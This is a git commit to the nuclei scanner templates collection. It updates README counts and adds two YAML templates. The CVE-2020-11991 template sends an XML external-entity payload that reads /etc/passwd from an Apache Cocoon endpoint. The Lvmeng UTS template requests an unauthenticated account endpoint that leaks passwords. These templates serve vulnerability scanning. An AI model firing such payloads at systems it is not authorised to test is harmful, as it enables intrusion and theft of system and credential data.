commit
a52551fffe
13
README.md
13
README.md
|
@ -28,11 +28,11 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts |
|
||||||
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 176 | default-logins | 8 |
|
| cves | 177 | default-logins | 8 |
|
||||||
| dns | 6 | exposed-panels | 74 |
|
| dns | 6 | exposed-panels | 74 |
|
||||||
| exposed-tokens | 9 | exposures | 44 |
|
| exposed-tokens | 9 | exposures | 45 |
|
||||||
| fuzzing | 4 | helpers | 2 |
|
| fuzzing | 4 | helpers | 2 |
|
||||||
| miscellaneous | 12 | misconfiguration | 40 |
|
| miscellaneous | 12 | misconfiguration | 43 |
|
||||||
| takeovers | 1 | technologies | 45 |
|
| takeovers | 1 | technologies | 45 |
|
||||||
| vulnerabilities | 81 | workflows | 18 |
|
| vulnerabilities | 81 | workflows | 18 |
|
||||||
|
|
||||||
|
@ -160,6 +160,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── CVE-2020-1147.yaml
|
│ │ ├── CVE-2020-1147.yaml
|
||||||
│ │ ├── CVE-2020-11710.yaml
|
│ │ ├── CVE-2020-11710.yaml
|
||||||
│ │ ├── CVE-2020-11738.yaml
|
│ │ ├── CVE-2020-11738.yaml
|
||||||
|
│ │ ├── CVE-2020-11991.yaml
|
||||||
│ │ ├── CVE-2020-12116.yaml
|
│ │ ├── CVE-2020-12116.yaml
|
||||||
│ │ ├── CVE-2020-12720.yaml
|
│ │ ├── CVE-2020-12720.yaml
|
||||||
│ │ ├── CVE-2020-13167.yaml
|
│ │ ├── CVE-2020-13167.yaml
|
||||||
|
@ -367,6 +368,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── gmail-api-client-secrets.yaml
|
│ │ ├── gmail-api-client-secrets.yaml
|
||||||
│ │ ├── htpasswd-detection.yaml
|
│ │ ├── htpasswd-detection.yaml
|
||||||
│ │ ├── laravel-env.yaml
|
│ │ ├── laravel-env.yaml
|
||||||
|
│ │ ├── lvmeng-uts-disclosure.yaml
|
||||||
│ │ ├── magento-config.yaml
|
│ │ ├── magento-config.yaml
|
||||||
│ │ ├── opcache-status-exposure.yaml
|
│ │ ├── opcache-status-exposure.yaml
|
||||||
│ │ ├── owncloud-config.yaml
|
│ │ ├── owncloud-config.yaml
|
||||||
|
@ -437,12 +439,14 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ ├── exposed-service-now.yaml
|
│ ├── exposed-service-now.yaml
|
||||||
│ ├── front-page-misconfig.yaml
|
│ ├── front-page-misconfig.yaml
|
||||||
│ ├── hadoop-unauth.yaml
|
│ ├── hadoop-unauth.yaml
|
||||||
|
│ ├── jboss-status.yaml
|
||||||
│ ├── jkstatus-manager.yaml
|
│ ├── jkstatus-manager.yaml
|
||||||
│ ├── jupyter-ipython-unauth.yaml
|
│ ├── jupyter-ipython-unauth.yaml
|
||||||
│ ├── kubernetes-pods.yaml
|
│ ├── kubernetes-pods.yaml
|
||||||
│ ├── larvel-debug.yaml
|
│ ├── larvel-debug.yaml
|
||||||
│ ├── linkerd-ssrf-detect.yaml
|
│ ├── linkerd-ssrf-detect.yaml
|
||||||
│ ├── manage-engine-ad-search.yaml
|
│ ├── manage-engine-ad-search.yaml
|
||||||
|
│ ├── mikrotik-graph.yaml
|
||||||
│ ├── misconfigured-docker.yaml
|
│ ├── misconfigured-docker.yaml
|
||||||
│ ├── nginx-status.yaml
|
│ ├── nginx-status.yaml
|
||||||
│ ├── php-errors.yaml
|
│ ├── php-errors.yaml
|
||||||
|
@ -464,6 +468,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ ├── tomcat-scripts.yaml
|
│ ├── tomcat-scripts.yaml
|
||||||
│ ├── unauthenticated-airflow.yaml
|
│ ├── unauthenticated-airflow.yaml
|
||||||
│ ├── unauthenticated-nacos-access.yaml
|
│ ├── unauthenticated-nacos-access.yaml
|
||||||
|
│ ├── unauthenticated-prtg.yaml
|
||||||
│ ├── wamp-xdebug-detect.yaml
|
│ ├── wamp-xdebug-detect.yaml
|
||||||
│ └── zenphoto-installation-sensitive-info.yaml
|
│ └── zenphoto-installation-sensitive-info.yaml
|
||||||
├── takeovers
|
├── takeovers
|
||||||
|
@ -632,7 +637,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**56 directories, 529 files**.
|
**56 directories, 534 files**.
|
||||||
|
|
||||||
📖 Documentation
|
📖 Documentation
|
||||||
-----
|
-----
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-11991
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Cocoon 2.1.12 XML Injection
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
||||||
|
headers:
|
||||||
|
Content-type: "text/xml"
|
||||||
|
body: |
|
||||||
|
<!--?xml version="1.0" ?-->
|
||||||
|
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
||||||
|
<userInfo>
|
||||||
|
<firstName>John</firstName>
|
||||||
|
<lastName>&ent;</lastName>
|
||||||
|
</userInfo>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: lvmeng-uts-disclosure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Lvmeng UTS Disclosure
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
condition: and
|
||||||
|
part: header
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "password"
|
||||||
|
- "nsfocus_uts"
|
||||||
|
- "MANAGER_IP"
|
||||||
|
condition: and
|
||||||
|
part: body
|
Loading…
Reference in New Issue